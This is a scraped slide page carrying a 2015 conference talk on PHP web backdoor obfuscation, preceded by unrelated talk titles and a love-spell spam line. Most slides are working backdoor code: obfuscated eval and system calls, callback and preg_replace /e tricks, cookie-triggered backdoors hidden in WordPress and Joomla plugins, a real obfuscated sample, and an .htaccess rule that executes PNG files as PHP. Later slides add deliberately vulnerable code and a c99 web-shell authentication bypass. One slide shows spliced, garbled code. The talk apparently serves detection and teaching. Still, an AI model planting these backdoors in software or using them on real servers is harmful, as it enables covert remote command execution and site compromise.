%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
 
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
 
WSO2CON 2024 - Navigating API Complexity: REST, GraphQL, gRPC, Websocket, Web...
WSO2CON 2024 - Navigating API Complexity: REST, GraphQL, gRPC, Websocket, Web...WSO2CON 2024 - Navigating API Complexity: REST, GraphQL, gRPC, Websocket, Web...
WSO2CON 2024 - Navigating API Complexity: REST, GraphQL, gRPC, Websocket, Web...
 
WSO2CON 2024 - Freedom First—Unleashing Developer Potential with Open Source
WSO2CON 2024 - Freedom First—Unleashing Developer Potential with Open SourceWSO2CON 2024 - Freedom First—Unleashing Developer Potential with Open Source
WSO2CON 2024 - Freedom First—Unleashing Developer Potential with Open Source
 

Php web backdoor obfuscation

  • 1. PHP web backdoor obfuscation Sandro “guly” Zaccarini EndSummerCamp 2k15
  • 2. PHP web backdoor obfuscation - guly@ESC 2k15 whoami • Sandro “guly” Zaccarini • Security Artist • guly@guly.org • @theguly
  • 3. PHP web backdoor obfuscation - guly@ESC 2k15 agenda • intro • backdoor placement • howto execute code • real world examples • vulnerabilities • hack a backdoor
  • 4. PHP web backdoor obfuscation - guly@ESC 2k15 PHP superglobals • $_GET • $_POST • $_COOKIE • $_REQUEST • $_SERVER
  • 5. PHP web backdoor obfuscation - guly@ESC 2k15 /superglobal.php?foo=1&bar=2 POST /superglobal.php?foo=1&bar=2 HTTP/1.0 Content-length: 391 Cookie: bar=4; foo=3 example of a POST request used to explain superglobals
  • 6. PHP web backdoor obfuscation - guly@ESC 2k15 /superglobal.php?foo=1&bar=2 var_dump($_GET) array(2) { ["foo"]=> string(1) "1" ["bar"]=> string(1) "2" } var_dump($_POST) array(1) { ["foo"]=> string(1) "3" } var_dump($_COOKIE) array(1) { ["bar"]=> string(1) "4" }
  • 7. PHP web backdoor obfuscation - guly@ESC 2k15 /superglobal.php?foo=1&bar=2 var_dump($_GET) array(2) { ["foo"]=> string(1) "1" ["bar"]=> string(1) "2" } var_dump($_POST) array(1) { ["foo"]=> string(1) "3" } var_dump($_COOKIE) array(1) { ["bar"]=> string(1) "4" } var_dump($_REQUEST); in red we can see what $_REQUEST has
  • 8. PHP web backdoor obfuscation - guly@ESC 2k15 "GET /superglobal.php?foo=1&bar=2 HTTP/1.1" 200 391 "POST /superglobal.php?foo=1&bar=2 HTTP/1.1" 200 391 /superglobal.php?foo=1&bar=2
  • 9. PHP web backdoor obfuscation - guly@ESC 2k15 /superglobal.php var_dump($_SERVER) headers: foo=3 array(x) { ["HTTP_HOST"]=> string(13) "172.16.34.141" ["HTTP_CONNECTION"]=> string(10) "keep-alive" ["CONTENT_LENGTH"]=> string(1) "5" ["HTTP_FOO"]=> string(1) "3" ...
  • 10. PHP web backdoor obfuscation - guly@ESC 2k15 /superglobal.php "GET /superglobal.php? foo=1&bar=2 HTTP/1.1" 200 391 "POST /superglobal.php HTTP/1.1" 200 760 again no traces about headers nor cookies
  • 11. PHP web backdoor obfuscation - guly@ESC 2k15 backdoor placement • requirements: • folder owned by www-data • file owned by www-data • folder/file chmod 777
  • 12. PHP web backdoor obfuscation - guly@ESC 2k15 backdoor placement • requirements: • folder owned by www-data • file owned by www-data • folder/file chmod 777
  • 13. PHP web backdoor obfuscation - guly@ESC 2k15 backdoor placement • configuration.php • themes/$theme/$file • upload/$file pathes almost everywhere writable by www-data user
  • 14. PHP web backdoor obfuscation - guly@ESC 2k15 howto execute code (HEC) • exec • shell_exec • passthru • popen • pcntl • create_function • ...
  • 15. PHP web backdoor obfuscation - guly@ESC 2k15 eval - HEC eval($x); eval(base64_decode($x)); eval(gzinflate(base64_decode($x))); $y='base'.(32*2).'_de'.'code'; eval($y($z)); $x = "phpinfo();" where $x = $_GET['x']
  • 16. PHP web backdoor obfuscation - guly@ESC 2k15 subs - HEC $x=str_replace('x', 's', 'xyxtem');$x($_GET[x]); $x='syste'.chr(109);$x($_GET[x]); $x=strrev("cexe_llehs");echo $x($_GET[x]); ?x=ls red block means URI used, like http:// foo.com/page.php?x=ls
  • 17. PHP web backdoor obfuscation - guly@ESC 2k15 straight - HEC assert($_GET[x]); $_GET[y]($_GET[x]); ?x=phpinfo() ?y=system&x=ls
  • 18. PHP web backdoor obfuscation - guly@ESC 2k15 callback - HEC call_user_func_array($_GET[y], array($_GET[x])); filter_var($_REQUEST[x], FILTER_CALLBACK, array('options' => 'assert')); ?x=phpinfo() ?y=system&x=ls
  • 19. PHP web backdoor obfuscation - guly@ESC 2k15 /e - HEC $a = array($_GET[x] => '|.*|e',); array_walk($arr, $_REQUEST[y], ''); preg_replace("/.*/e",$_GET[x], ""); mb_ereg_replace
 ('.*', $_REQUEST[x], '', 'e'); ?x=ls&y=preg_replace ?x=ls
  • 20. PHP web backdoor obfuscation - guly@ESC 2k15 register function - HEC ?y=assert&x=phpinfo() $e = $_REQUEST[y]; register_tick_function($e, $_GET[x]); register_shutdown_function($e, $_GET[x]);
  • 21. PHP web backdoor obfuscation - guly@ESC 2k15 sqlite - HEC ?y=assert&x=phpinfo() $e = $_REQUEST[y]; $db = new PDO('sqlite:sqlite.db3'); $db->sqliteCreateFunction('z', $e, 1); $sth = $db->prepare("SELECT z(:exec)"); $sth->execute(array(':exec' => $_REQUEST[x]));
  • 22. PHP web backdoor obfuscation - guly@ESC 2k15 memcache - HEC ?x=phpinfo() $mem = new Memcache(); $re = @$mem->addServer('localhost', 11211, TRUE, 100, 0, -1, TRUE, create_function('$a,$b,$c,$d,$e', 'return assert($a);')); $mem->connect($_REQUEST[x], 11211, 0);
  • 23. PHP web backdoor obfuscation - guly@ESC 2k15 yaml - HEC ?x=ls $str = urlencode($_REQUEST[x]); $yaml = <<<EOD greeting: !{$str} "|.+|e" EOD; $parsed = yaml_parse($yaml, 0, $cnt, array("!{$_REQUEST[x]}" => 'preg_replace'));
  • 24. PHP web backdoor obfuscation - guly@ESC 2k15 real world examples
  • 25. PHP web backdoor obfuscation - guly@ESC 2k15 real world examples <?php $exg="JGMnd9J2NvdW50JzskYTnd0kX0ndNPndT0tJRTtpZihyZXNldCgknd YSk9PSdtandCcgJndiYgJGMondJGEpPjM"; $iyo="GxhndY2UndoYXJyYndXkoJy9bndXlndx3PVxzXS8nLndCcvXHMvndJ yksIGFyndcmF5KCcnLCcrJyk"; $ts = str_replace("b","","bsbtr_brbepblabcbe"); $fy="sIGpndvaW4oYXJyYXlfc2xpY2UoJndGEndsJGMoJGEpLTndMpKndSkp KTtlYnd2hvICc8LycuJGsnduJz4nO30="; $sjb="peyRrPSndd1nddGU0bndSc7ZWNobyAnPCcnduJGsundJz4nO2ndV2Y WwoYmFzZndTY0X2RlY29kZShwcmVnX3Jlc"; $dzy = $ts("er", "", "erberaersereer6er4er_dereercerodere"); $mc = $ts("y","","ycyryeyaytye_yfyuynctyiyoyn"); $tha = $mc('', $dzy($ts("nd", "", $exg.$sjb.$iyo.$fy))); $tha(); ?> no reversing allowedno reversing allowed
  • 26. PHP web backdoor obfuscation - guly@ESC 2k15 real world: array_diff_ukey array_diff_ukey(
 array(
 (string)$_GET['password']=>1),
 array(
 (string) $_GET['repassword'])=>2),
 $_REQUEST['login']) ?password=ls&repassword=
 &login=system doesn't look like a login page code?
  • 27. PHP web backdoor obfuscation - guly@ESC 2k15 real world: array_diff_ukey "GET /array_ukey_diff/array_ukey_diff.php? password=ls&repassword=&login=system HTTP/1.1" 200 253 ?password=ls&repassword=
 &login=system
  • 28. PHP web backdoor obfuscation - guly@ESC 2k15 real world: $_SERVER ($a=@$_SERVER['HTTP_REMOTE_ADR'])
 .@$a($_SERVER['HTTP_SERVER_ADR']); HEADER VALUE REMOTE_ADR system SERVER_ADR ls ($a=@system).$a(ls) got the typo?
  • 29. PHP web backdoor obfuscation - guly@ESC 2k15 real world: $_SERVER "GET /a/a.php HTTP/1.1" 200 239" HEADER VALUE REMOTE _ADR system SERVER_ ADR ls
  • 30. PHP web backdoor obfuscation - guly@ESC 2k15 real world: extract @extract ($_REQUEST); @die ($x($y)); ?x=shell_exec&y=ls
  • 31. PHP web backdoor obfuscation - guly@ESC 2k15 real world: extract "GET /extract/extract.php? x=shell_exec&y=ls HTTP/1.1" 200 244" ?x=shell_exec&y=ls
  • 32. PHP web backdoor obfuscation - guly@ESC 2k15 real world: LICESNE.php preg_match_all('/.*/', php_strip_whitespace(__FILE__), $matches); eval(base64_decode($matches[0] [2])); /* BEGIN LICENSE CODE */ cGhwaW5mbygp again, got the typo?
  • 33. PHP web backdoor obfuscation - guly@ESC 2k15 real world: LICESNE.php
  • 34. PHP web backdoor obfuscation - guly@ESC 2k15 real world: .htaccess $ pwd /var/www/uploads $ cat .htaccess AddType application/x-httpd-php .png <Files "c.png"> SetHandler application/x-httpd-php </Files>
  • 35. PHP web backdoor obfuscation - guly@ESC 2k15 real world: .htaccess
  • 36. PHP web backdoor obfuscation - guly@ESC 2k15 real world: .htaccess same url leads to different results?! wait, at the left there's phpinfo() !
  • 37. PHP web backdoor obfuscation - guly@ESC 2k15 real world: .htaccess AddType application/x-httpd-php
 .рng
  • 38. PHP web backdoor obfuscation - guly@ESC 2k15 real world: .htaccess "GET /htaccess/a.%D1%80ng HTTP/1.1" 200 18105" "GET /htaccess/a.png HTTP/1.1" 200 184249" my workstation doesn't handle unicode, log analysis system should
  • 39. PHP web backdoor obfuscation - guly@ESC 2k15 real world: exif_data
  • 40. PHP web backdoor obfuscation - guly@ESC 2k15 PHP's exif_read_data function PHP has a function called exif_read_data which allows it to read the header data of image files.  It is used extensivly in many different plugins and tools.
  • 41. PHP web backdoor obfuscation - guly@ESC 2k15 "Make"]=> string(5) "/.*/e" ["Model"]=> string(108) "eval(base64_decode('aWYgKG..'));" real world: exif_data $exif = exif_read_data('http:// foo.bar/image.jpg); preg_replace($exif['Make'], $exif['Model'],'Canon');
  • 42. PHP web backdoor obfuscation - guly@ESC 2k15 real world: wp plugin <?php function start_cforms_session(){ @session_cache_limiter('private, must- revalidate'); @session_cache_expire(0); $form1=@$_COOKIE['Kcqf3']; if ($form1) { $opt=$form1(@$_COOKIE['Kcqf2']); $au=$form1(@$_COOKIE['Kcqf1']); $opt=("/292/e",$au,292); die(); } }
  • 43. PHP web backdoor obfuscation - guly@ESC 2k15 real world: joomla plugin public function __construct() { $filter = JRequest::getString('p3', Null, 'cookie'); if ($filter) { $option = $filter(JRequest::getString('p2', Null, 'cookie')); $auth = $filter(JRequest::getString('p1', Null, 'cookie')); $option("/123/e",$auth,123); die(); } }
  • 44. PHP web backdoor obfuscation - guly@ESC 2k15 vulns: isadmin//Authentication $user = safeEscape($_POST['user']); $pass = safeCrypt(safeEscape($_POST['pass'])); $query = "SELECT isadmin FROM user where user= $user and pass=$pass"; $isadmin = mysql_query($query); @extract($_REQUEST['login']); if ($isadmin) { admin(); } else { user(); } pseudo function, let's pretend safeEscape and safeCrypt are really safe
  • 45. PHP web backdoor obfuscation - guly@ESC 2k15 vulns: isadmin http://foo.bar/login.php? login[isadmin]=1
  • 46. PHP web backdoor obfuscation - guly@ESC 2k15 vulns: sqli prevention $check = intval($_GET[‘id']); if ($check == $_GET['id']) { $query = "SELECT name FROM table where id=$_GET[‘id']"; $result = mysql_query($query); var_dump($result); } ...gone wrong :)
  • 47. PHP web backdoor obfuscation - guly@ESC 2k15 vulns: name $query = "SELECT name FROM user where user=$user and pass=$pass"; $name = mysql_query($query); $safeName = @preg_replace("/W*/e",$name,''); echo "Welcome, <pre>$safe_name"</pre>";
  • 48. PHP web backdoor obfuscation - guly@ESC 2k15 vulns: name name => system($_GET[c]); http://foo.bar/ welcome.php?c=whoami update sql db setting my name to 'system($_GET[c]);'
  • 49. PHP web backdoor obfuscation - guly@ESC 2k15 vulns: conf.php <?php $smtp_host = '127.0.0.1'; $smtp_user = ''; $smtp_pass = ''; $smtp_from = 'root@localhost'; //sender $smtp_method = 'system'; //system or smtp $smtp_crypt = 'NONE'; //NONE SSL STARTTLS ... pretend a CMS uses a conf like this, we add a "cuscom" $smtp_method
  • 50. PHP web backdoor obfuscation - guly@ESC 2k15 vulns: conf.php <?php global $smtp_host,$smtp_user,$smtp_pass; global $smtp_from,$smtp_method,$smtp_crypt; require 'conf.php'; doCron(); $smtp_method($_GET['mailto']); http://foo.bar/cron.php? mailto=ls
  • 51. PHP web backdoor obfuscation - guly@ESC 2k15 more vulns • imagecreatefromjpeg • gd • unserialize • php object injection will you attend to V2.0 talk? :)
  • 52. PHP web backdoor obfuscation - guly@ESC 2k15 hack backdoor: c99//Authentication $login = "1"; //login [cut] @extract($_REQUEST["c99shcook"]); [cut] if ($login) {  if(empty($md5_pass)) {$md5_pass = md5($pass);}  if (($_SERVER["PHP_AUTH_USER"] != $login ) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) {   if ($<?php $check = intval($_GET['id']); if ($check == $_GET['id']) { $query = "SELECT name FROM table where id=$_GET['id']"; $result = mysql_query($query); var_dump($result); } ?> === false) {$login_txt = "";}   elseif (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}   header("WWW-Authenticate: Basic realm="c99shell ".$shver.": ".$login_txt.""");   header("HTTP/1.0 401 Unauthorized");   exit($accessdeniedmess);  } } // go on
  • 53. PHP web backdoor obfuscation - guly@ESC 2k15 hack backdoor: c99 https://127.0.0.1/c99.php? c99shcook[login]=0
  • 54. PHP web backdoor obfuscation - guly@ESC 2k15 hack backdoor: c99
  • 55. PHP web backdoor obfuscation - guly@ESC 2k15 credits • ESC • Sucuri • lazy webmaster/developer
  • 56. PHP web backdoor obfuscation - guly@ESC 2k15 question? acta est fabula, plaudite!